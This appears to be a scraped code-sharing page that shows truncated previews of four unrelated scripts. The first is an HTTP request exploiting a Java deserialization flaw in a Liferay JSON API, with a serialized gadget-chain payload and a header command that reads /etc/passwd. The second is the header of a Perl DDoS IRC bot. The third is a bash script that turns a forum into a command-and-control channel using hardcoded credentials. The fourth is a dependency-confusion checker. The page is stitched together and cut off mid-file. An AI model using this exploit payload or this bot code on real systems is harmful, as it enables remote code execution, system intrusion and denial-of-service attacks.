POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close
cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F63
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/perl | |
###################################################################################################################### | |
###################################################################################################################### | |
## DDoS Perl IrcBot v1.0 / 2012 by w0rmer Security Team ## [ Help ] ######################################### | |
## Stealth MultiFunctional IrcBot writen in Perl ####################################################### | |
## Teste on every system with PERL instlled ## !u @system ## | |
## ## !u @version ## | |
## This is a free program used on your own risk. ## !u @channel ## | |
## Created for educational purpose only. ## !u @flood ## |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# https://null-byte.com/turn-forums-into-c-c-servers-0196708/ | |
while true; do | |
forumUser="tokyoneon"; | |
username="[email protected]"; | |
password="treHGFd76547^%$"; | |
cookies='/tmp/forum_cookies'; | |
function urlencode () |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/env python3 | |
# https://www.bleepingcomputer.com/news/security/researcher-hacks-over-35-tech-firms-in-novel-supply-chain-attack/ | |
# The following script finds all package.json files in the current dir and checks if there are referenced any | |
# dependencies that no public package is available for, making your application vulnerable to supply-chain attack. | |
# Simply run ./packagejson.py in your root repository direcotory. | |
import json | |
import requests | |
from pathlib import Path | |
import urllib.parse |